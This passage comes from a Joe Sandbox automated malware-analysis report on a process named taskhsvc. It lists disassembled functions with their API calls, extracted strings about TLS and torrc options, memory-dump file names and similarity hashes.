Instruction Fuzzy Hash: 756127B0A097058FCB10EF65C94569EBBF0AF48314F05889DE5C89B352D778D984EF12

Uniqueness

Uniqueness Score: -1.00%

Function 00EE284F Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 255
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FC8710: strlen.MSVCRT ref: 00FC872A
Part of subcall function 00FC8710: malloc.MSVCRT ref: 00FC8736
Part of subcall function 00FC8710: strlen.MSVCRT ref: 00FC8740
Part of subcall function 00FC8710: malloc.MSVCRT ref: 00FC874C
Part of subcall function 00FC8710: free.MSVCRT ref: 00FC87AC

strlen.MSVCRT ref: 00EE2A07
memcpy.MSVCRT ref: 00EE2A46
strlen.MSVCRT ref: 00EE2ACE
memcpy.MSVCRT ref: 00EE2AFA
memcpy.MSVCRT ref: 00EE2B34
__stack_chk_fail.LIBSSP-0 ref: 00EE2B6F

Strings

#, xrefs: 00EE2B39
#, xrefs: 00EE2B21
%s: , xrefs: 00EE29C7
%s(): , xrefs: 00EE29CE

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: strlen$memcpy$malloc$__stack_chk_failfree
String ID: #$#$%s(): $%s:
API String ID: 3939626693-1525097197
Opcode ID: 8d4f459d04f6cf185d0b7bec3851b1bf9d6aed539c2c9fb64a38e4280bb8df1d
Instruction ID: 035d7a88434490bfd03cd2cdf20bfde4114ea28a0f271fcc919eab550931f76d
Opcode Fuzzy Hash: 8d4f459d04f6cf185d0b7bec3851b1bf9d6aed539c2c9fb64a38e4280bb8df1d
Instruction Fuzzy Hash: 6BC19BB0E042499FCB10DFA9C584A9EBBF5BF88314F14A529E958F7305E738A841CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00EF5CFA Relevance: 15.2, APIs: 10, Instructions: 213
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF1144: memset.MSVCRT ref: 00EF117D
Part of subcall function 00EF1144: __stack_chk_fail.LIBSSP-0 ref: 00EF1190

abort.MSVCRT ref: 00EF5D72

Part of subcall function 00EE6107: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00DEFAF4), ref: 00EE61A4
Part of subcall function 00EE6107: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00DEFAF4), ref: 00EE61B7

abort.MSVCRT ref: 00EF5DB1
abort.MSVCRT ref: 00EF5DF6
strerror.MSVCRT ref: 00EF5ECF
_close.MSVCRT ref: 00EF5F8C

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

__stack_chk_fail.LIBSSP-0 ref: 00EF601B

Part of subcall function 00EE6BC4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EF5F20), ref: 00EE6C12

strerror.MSVCRT ref: 00EF5F30

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

free.MSVCRT ref: 00EF5FB5
free.MSVCRT ref: 00EF5FDD
free.MSVCRT ref: 00EF5FFF

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$free$strerrorstrrchr$_closememset
String ID:
API String ID: 3670154213-0
Opcode ID: 2367f4a36df4d8c2b6a5dfc6249a466008ae2419f7f72aee0ada2a39aca6da67
Instruction ID: 2c82a3d3001e43f7414789e75cb35c59fdfc4607ebf4f5bb9a1077974347aacf
Opcode Fuzzy Hash: 2367f4a36df4d8c2b6a5dfc6249a466008ae2419f7f72aee0ada2a39aca6da67
Instruction Fuzzy Hash: 73A106B4A0470A8FDB04DFA9C585AAEBBF0BF48354F058858E594EB351D738E944CF21

Uniqueness

Uniqueness Score: -1.00%

Function 00DC16C8 Relevance: 14.7, APIs: 4, Strings: 4, Instructions: 698
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF5435: __stack_chk_fail.LIBSSP-0 ref: 00EF5455

Part of subcall function 00DC2D31: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00DB9B3E), ref: 00DC2DCE

abort.MSVCRT ref: 00DC174D
getsockopt.WS2_32 ref: 00DC17F9

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

__stack_chk_fail.LIBSSP-0 ref: 00DC2115

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Strings

TLS connection closed on flush, xrefs: 00DC1B95
TLS closed during flush, xrefs: 00DC1BC7
tls error. breaking., xrefs: 00DC1B8E
TLS error in during flush, xrefs: 00DC1BC0

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abortgetsockopt
String ID: TLS closed during flush$TLS connection closed on flush$TLS error in during flush$tls error. breaking.
API String ID: 3001274975-2632946057
Opcode ID: a6ba7d1981008434171373132b868ea46045ecb42ee43930d3128740f227c62d
Instruction ID: e904b7730726b875b9756d0162b412e64d1b850757140277fa9f356d7d6f95a8
Opcode Fuzzy Hash: a6ba7d1981008434171373132b868ea46045ecb42ee43930d3128740f227c62d
Instruction Fuzzy Hash: D162C674A04255DFCB00EFA9C485AADBBF1EF45310F19895AE8A8DB352D734D842DF22

Uniqueness

Uniqueness Score: -1.00%

Function 00DF9D8C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 138
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00DF9E0E
free.MSVCRT ref: 00DF9E9F

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

free.MSVCRT ref: 00DF9E60
strcmp.MSVCRT ref: 00DF9ED1
__stack_chk_fail.LIBSSP-0 ref: 00DF9F66

Strings

--ignore-missing-torrc, xrefs: 00DF9DD6
--defaults-torrc, xrefs: 00DF9DC1

Memory Dump Source

Source File: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failfreestrcmp
String ID: --defaults-torrc$--ignore-missing-torrc
API String ID: 1505556837-1565761774
Opcode ID: f9aed3eed92dc400527ff35f4da4f41bf082ab882a4ab4355a97a87295147420
Instruction ID: 7b92420e6a55b56a3da687c4fce6efa520621d4765f6fdd04df0e562c71482ab
